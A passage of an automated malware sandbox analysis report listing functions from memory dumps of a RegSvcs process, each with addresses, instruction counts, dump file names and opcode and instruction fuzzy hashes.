                                              • Instruction ID: 93424e4d83a3b3e1056dd042b1cc15d92145689fbf159d3c72b022c45ef1fd40
                                              • Opcode Fuzzy Hash: 63a986d1438a14b50dea9dbd0b5bb8322b12ab38d5cf273d6a5d9355c92d48e1
                                              • Instruction Fuzzy Hash: B251A5312532458FD706FB68FE80A597F71F79A304304CA69E0054B73EDB6869ABCB91
                                              Function 00DCDE6A Relevance: .1, Instructions: 101COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 612527dd9c8ba70cc989d4b052c00890d2a96ab9a0969e8c5ccb82ae2d39167e
                                              • Instruction ID: 0fb4f1cfae2662b1b653657f82c021cb4433b409411f24ae47d41f267c64fe37
                                              • Opcode Fuzzy Hash: 612527dd9c8ba70cc989d4b052c00890d2a96ab9a0969e8c5ccb82ae2d39167e
                                              • Instruction Fuzzy Hash: 32310C75B00616EFD705DB68C990E3AB76ABF84300F55C168E4459B2A9CB36EC52C790
                                              Function 00DC5097 Relevance: .1, Instructions: 94COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eb2d2ff64b78ba56b2d101cde44d0ec2a96a9986a39aeab62fb30afe106429b8
                                              • Instruction ID: bfe30fef10016549f4c7ef12d8ad82e03f70fca4629513137ed1e1f5221457fa
                                              • Opcode Fuzzy Hash: eb2d2ff64b78ba56b2d101cde44d0ec2a96a9986a39aeab62fb30afe106429b8
                                              • Instruction Fuzzy Hash: F8315E346017168FDB14EB64D965B9E73B6EF49340F14056CD401AB39ADF3AEC82CBA0
                                              Function 00DC26DC Relevance: .1, Instructions: 93COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5bdfe02fefd5e63fdeabe509bfb66474f13237a89f8e57e2251e83091175af34
                                              • Instruction ID: 876797327444832a6e6148ca4cb678a821b99ed63fd30f0f6567e77982bee123
                                              • Opcode Fuzzy Hash: 5bdfe02fefd5e63fdeabe509bfb66474f13237a89f8e57e2251e83091175af34
                                              • Instruction Fuzzy Hash: 6641DDB1D00349DFDB10DFA9C584AEEBFB5EF48310F248429E819AB264DB759949CB90
                                              Function 00DC26E8 Relevance: .1, Instructions: 90COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 89634e88fa88dd721e4968f4e60a59ee23918dd4f835791705345ec49cd77d8c
                                              • Instruction ID: 16ef16f9473b1ba26bc221a8bd73323e4caee238929834f76e7c6db886db55fb
                                              • Opcode Fuzzy Hash: 89634e88fa88dd721e4968f4e60a59ee23918dd4f835791705345ec49cd77d8c
                                              • Instruction Fuzzy Hash: BE41DFB0D00349DFDB10DFA9C584ADEBFB5FF48310F248429E819AB254DB75A949CBA0
                                              Function 00DC50A8 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 19618e80920ce130877b924d1e1da510d428467bf351cccc051af12ede89d0c4
                                              • Instruction ID: 30d3324302acbe1aca3923925870478fcad4f741471734025002ba934d09703f
                                              • Opcode Fuzzy Hash: 19618e80920ce130877b924d1e1da510d428467bf351cccc051af12ede89d0c4
                                              • Instruction Fuzzy Hash: F1314F346017168FDB14EB74D924B9E77B6AF49340F14056CD401AB399DF3AEC82CBA0
                                              Function 00DCA068 Relevance: .1, Instructions: 85COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a46eef71cb8bb9ed2c8543c2d7d2a185b8ce5bdedaec9c83767ea8e58e307e00
                                              • Instruction ID: 9451bd56ca8aeb2da2dda01f37e61c773db3d3446bca661cebba68534658d919
                                              • Opcode Fuzzy Hash: a46eef71cb8bb9ed2c8543c2d7d2a185b8ce5bdedaec9c83767ea8e58e307e00
                                              • Instruction Fuzzy Hash: E0318034A0020A9BDB15DF68C950B9EB7B6EF89304F148629E905EB254DB71AC46CBA1
                                              Function 00DC169F Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c0802f1403e0d98cf99f1a21dac6e4c54a8b350fae3d4c456562e4a791b2692
                                              • Instruction ID: 18b0eb8b1516e2c71b52645644333ddfadab00756aabf83dab8d08965b924458
                                              • Opcode Fuzzy Hash: 1c0802f1403e0d98cf99f1a21dac6e4c54a8b350fae3d4c456562e4a791b2692
                                              • Instruction Fuzzy Hash: FC21D6786411228FEF12AB78E988F693765E756300F148A69D006C73ABDB38DC55C7B2
                                              Function 00DCA078 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9cd86a98376fdeccf93c9ca07b11abd7d504cf1453a1b79fcaa3dc4a72fce5b7
                                              • Instruction ID: a9a4bb3b53dacb3e69308457c5741d4db2750f1cfc1bbe031c3703c669406284
                                              • Opcode Fuzzy Hash: 9cd86a98376fdeccf93c9ca07b11abd7d504cf1453a1b79fcaa3dc4a72fce5b7
                                              • Instruction Fuzzy Hash: 4F214D34E0024A9BDB15DF68D950B9EFBB2EF89304F14C629E805AB254DB719C45CBA1
                                              Function 00DC17C0 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd013a97c40e2b992dee65444670ed652678d84a155a3412b47863ab3690856b
                                              • Instruction ID: 0a475fb090816c6ba6a5f60dad8e9cc8f0ad3c67cdcd195d81965f02715c5b98
                                              • Opcode Fuzzy Hash: bd013a97c40e2b992dee65444670ed652678d84a155a3412b47863ab3690856b
                                              • Instruction Fuzzy Hash: 52216879B012228FCF109B789844B6E37BAEB49300F104878E405C7346EB34C80387A1
                                              Function 00DC9F68 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f04b90b9c9167de9c18510d95ac7758504f0c8e6da97b5ecf052a91fa6308d4d
                                              • Instruction ID: 96caefa8e03c7d4ad4a788f32801c86a4c15abd217799667b9885720bf1fe1d0
                                              • Opcode Fuzzy Hash: f04b90b9c9167de9c18510d95ac7758504f0c8e6da97b5ecf052a91fa6308d4d
                                              • Instruction Fuzzy Hash: B2214135E0021A9BCB14CF64C494A9EF7B2AF89310F25851EE815E7355DB71EC46CB61
                                              Function 00DC4F89 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fd109d3f01c6c8d2051881336328ecfba86082abaaf948c79b9f77c5ab4d93d2
                                              • Instruction ID: 13098a99e5f108da841c678d53ae5c4e1ecded7b1bf241803c7a9219731ddcaf
                                              • Opcode Fuzzy Hash: fd109d3f01c6c8d2051881336328ecfba86082abaaf948c79b9f77c5ab4d93d2
                                              • Instruction Fuzzy Hash: 64214B386002068FDB14EBB4D559B9E77F1EF89304F10446CE906EB365EB769D42DBA0
                                              Function 00DC1878 Relevance: .1, Instructions: 74COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 88f836b19f29bdaeb1bf037d987b517a3409f8c2265b2ecf8f40ab8cba3dc7ed
                                              • Instruction ID: dced258b61d0e91f5d9562baeb2e123a133baf3aa64a52b7fcbdc0093736086b
                                              • Opcode Fuzzy Hash: 88f836b19f29bdaeb1bf037d987b517a3409f8c2265b2ecf8f40ab8cba3dc7ed
                                              • Instruction Fuzzy Hash: EF217C34A002168FDB14EB68C525BAE77F6AF4A340F24046CD505EB256DF36DD41CBB5
                                              Function 00DCA860 Relevance: .1, Instructions: 74COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5bab84997b897d767b3a825b18243a218daff7538f5fcc6adc35396edc3d8bef
                                              • Instruction ID: f77288ab0b7e59ea6dc32e48398959715908186924180e3187eca95bf0183cfe
                                              • Opcode Fuzzy Hash: 5bab84997b897d767b3a825b18243a218daff7538f5fcc6adc35396edc3d8bef
                                              • Instruction Fuzzy Hash: 8C217171A001098FDB14DB6DC955FAE7BF5AF88718F258129E505EB3A0DA719D008BA1
                                              Function 00A3D030 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4105721986.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_a3d000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f81a5dccf038ab2dcb41d27f681e253a85995034d053338164979d4564d5aef
                                              • Instruction ID: 083074f3fa39b23532b992859a03a30120c1ef5c1149ee75f8708ac9b6bd9080
                                              • Opcode Fuzzy Hash: 0f81a5dccf038ab2dcb41d27f681e253a85995034d053338164979d4564d5aef
                                              • Instruction Fuzzy Hash: BA210471504304DFCB18DF14E9C0B26BBB5FB85714F24C66DE80A4B296C37AD847CA62
                                              Function 00DC148E Relevance: .1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ccbcda24dcc044ea112e0b219145fa7b3b5e521b2ce47a772166d3359b9d8906
                                              • Instruction ID: 7d35c360b6410b1faf39ff3c187b635730369f0fa4ec14cc9ee287eb369a1bd8
                                              • Opcode Fuzzy Hash: ccbcda24dcc044ea112e0b219145fa7b3b5e521b2ce47a772166d3359b9d8906
                                              • Instruction Fuzzy Hash: 3F218E75A002268BCB25AF789451BADBBB5EF45311F24447DE805D7202E735C84287A1
                                              Function 00DC1382 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ae997003402087b93d3ba62705746d6288363243d8fdd1e0c1dc1cb2ad832db6
                                              • Instruction ID: 9e5da09fea35e92d501ec2ebe5f5daee058a2261acf94048fc731d0a14b8318f
                                              • Opcode Fuzzy Hash: ae997003402087b93d3ba62705746d6288363243d8fdd1e0c1dc1cb2ad832db6
                                              • Instruction Fuzzy Hash: 6B21D878A041628FEB3A5738D448B697721EB57315F184C6EE407C73D2D638CC55C762
                                              Function 00DC1888 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a80433e364392967485c0866554b47939ae5e5ce8d59f86e0b85f4244544a06c
                                              • Instruction ID: b8af987628415e0fbbbe667d11b31abcb3fcbf49c50138a1bec1b16bf0e532c3
                                              • Opcode Fuzzy Hash: a80433e364392967485c0866554b47939ae5e5ce8d59f86e0b85f4244544a06c
                                              • Instruction Fuzzy Hash: 0A213B38B002168FDB14EB64C524BAE77F6AB4A340F24046CD405EB256DF36DD41DBB1
                                              Function 00DCA85A Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4bd8aa4316c9382237f23be0080cd3bee09150565741c493aed8a7c3b2b65d64
                                              • Instruction ID: d2c449993d6a8e53c1a2a051011535d57ee4e46bf70511c83c85e3f7a4617e05
                                              • Opcode Fuzzy Hash: 4bd8aa4316c9382237f23be0080cd3bee09150565741c493aed8a7c3b2b65d64
                                              • Instruction Fuzzy Hash: AA21AF71A0011A8FEB04DB68C955BAD77F6AF88714F258029E501EB3A0DA719D008BA1
                                              Function 00DC9F78 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e996134bc5180253e49e7d8fb73ddac8d71b4e093daa17745454835f6f104d9
                                              • Instruction ID: 4bbba3c403592afa6d64b37c22f72678d7738938e32481eb4189fa6792f3c77c
                                              • Opcode Fuzzy Hash: 9e996134bc5180253e49e7d8fb73ddac8d71b4e093daa17745454835f6f104d9
                                              • Instruction Fuzzy Hash: 79217F30E0020A9BCB18CF64C494A9EF7B2AF89300F20862EE815FB354DB70EC45CB61
                                              Function 00DC16B0 Relevance: .1, Instructions: 69COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 822b196d8fc875e6b185506c418efa4584c98a30dd07bfd786e73f66a08f11e3
                                              • Instruction ID: e675c1f1641161873e21434737c014d32018f49328d8cafef413c765e20b6c9f
                                              • Opcode Fuzzy Hash: 822b196d8fc875e6b185506c418efa4584c98a30dd07bfd786e73f66a08f11e3
                                              • Instruction Fuzzy Hash: CA2166386411128FEF12E778E984F19776AE746304F148A75D007C73AADB38DC95CBA2
                                              Function 00DC4F98 Relevance: .1, Instructions: 68COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b8408307d73f767e0c5659018d426c84dc0c1afdffdeb129612ed631814f5738
                                              • Instruction ID: 92f441fde2caef70cc39ea86c73be718ebae24e58b582496bd698db59c851fdc
                                              • Opcode Fuzzy Hash: b8408307d73f767e0c5659018d426c84dc0c1afdffdeb129612ed631814f5738
                                              • Instruction Fuzzy Hash: 01211B38600605CFDB14DB78D958BAD77F1EF89304B10446CE506EB3A5DB369D41DBA0
                                              Function 00DC0848 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf1c3e270845f1f6dcf40df913d179386a0b8931759dd90cb2cf554baa421d06
                                              • Instruction ID: b4c6aba5c1c9ce9c73f9fdd0166d9c1c6f3c421d9ba0f574e85ccbd0cf525338
                                              • Opcode Fuzzy Hash: cf1c3e270845f1f6dcf40df913d179386a0b8931759dd90cb2cf554baa421d06
                                              • Instruction Fuzzy Hash: 1C119130B01206DBEF24BA78D840B2E7AA5EF45310F28C97DE106DB351DA65DC858BE2
                                              Function 00DC0838 Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15baf4c6152483f08d0bf36b814f744e84cad1ff743fcdfdb48457b860b3f798
                                              • Instruction ID: c873c7a1df393fae355e01d92cd0b24c56770e06b016c4c0314e4e0f8438e27d
                                              • Opcode Fuzzy Hash: 15baf4c6152483f08d0bf36b814f744e84cad1ff743fcdfdb48457b860b3f798
                                              • Instruction Fuzzy Hash: E011E330B05202DBEF256A748850B7E7AA0EF46310F28C93ED146CB252DA74CC858BE2
                                              Function 00DC1498 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eb8fab17c3d3c09a3fb107e779a053db457e09c9caa47c9a921fe885466556e4
                                              • Instruction ID: 3069104f922a8314292607eccade06d37874a63cfdc7efdda4e129162450ce16
                                              • Opcode Fuzzy Hash: eb8fab17c3d3c09a3fb107e779a053db457e09c9caa47c9a921fe885466556e4
                                              • Instruction Fuzzy Hash: 2F015B35A012268BCB25EFB88451AAE7AF5EF49310F24047DE806E7302E735D8818BB1
                                              Function 00A3D02B Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4105721986.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_a3d000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction ID: ce156e1fdee7cdac5fa60714368558eba80774ebf846672d2ac100fd72e70e2f
                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction Fuzzy Hash: 1511DD75504280CFCB15CF14E5C4B15FFB1FB84318F28C6AAE84A4B656C33AD84ACB62
                                              Function 00DCA6B8 Relevance: .0, Instructions: 50COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dd5724b3a07f7ad2a8cdcf0dadcdc1742c11fc77a1d734f8ea3d9f66ee6104fe
                                              • Instruction ID: f704da5f4aa214466655f30c4199e62e55722d883a9e7c0c55396712889f0a6a
                                              • Opcode Fuzzy Hash: dd5724b3a07f7ad2a8cdcf0dadcdc1742c11fc77a1d734f8ea3d9f66ee6104fe
                                              • Instruction Fuzzy Hash: A511A531A002058FCB00DF98D98078ABB72FF85311F198579D80C5F29AD774AD49C7A1
                                              Function 00DC8F08 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0a53116e101e6d895f685c0e82154369a171fed1940414b53d027670fd38e19d
                                              • Instruction ID: dcc2a5dee6cea0b4f2e03b3ce7d77cee372909c604801a0e88aaa4ce27b5f568
                                              • Opcode Fuzzy Hash: 0a53116e101e6d895f685c0e82154369a171fed1940414b53d027670fd38e19d
                                              • Instruction Fuzzy Hash: 4C0184749011099FDF01FFB8FA4169CBFB2EB41300B0046B9C0059B26AEA349F45DB55
                                              Function 00DC1524 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b69510adf7d3dbe5e42e38d1286fda6253f0e1aac59bd3250c100f23f8fa9515
                                              • Instruction ID: 3832449f28d803b7875b2ae0f74dd2ab97575f863a1efff494a6a0e5dde50c4e
                                              • Opcode Fuzzy Hash: b69510adf7d3dbe5e42e38d1286fda6253f0e1aac59bd3250c100f23f8fa9515
                                              • Instruction Fuzzy Hash: CBF0F67BA04162CBC7228BA48451BACBF70EE9631172900EFD842DB213D321D842C771
                                              Function 00DC7EA8 Relevance: .0, Instructions: 34COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8157033ff1d7fc1639435b57dcbcb20c73706006bcdf0121eb8e5cea0afbc217
                                              • Instruction ID: 2c3d13fbba2f1dd414f93bc412c9eff05de0c9fc91fac75af6b3ff7f47319f5b
                                              • Opcode Fuzzy Hash: 8157033ff1d7fc1639435b57dcbcb20c73706006bcdf0121eb8e5cea0afbc217
                                              • Instruction Fuzzy Hash: C1F0C439B40214CFCB15EB64D598B6C77B2EF88711F2084A8E5069B3B4DB35AD52CF50
                                              Function 00DC8F18 Relevance: .0, Instructions: 33COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 652867f19174cc911c359e1750c95796e203f25d3d58ed0dd87902f486177fe4
                                              • Instruction ID: 8216abfd6e94553201555e74e25fe11295c901171d6de9ecd7396007f6e6837e
                                              • Opcode Fuzzy Hash: 652867f19174cc911c359e1750c95796e203f25d3d58ed0dd87902f486177fe4
                                              • Instruction Fuzzy Hash: 64F044349011099FDF01FFB8FA4169DBBB6EB40300F5086B9C0059726DEF35AE549B95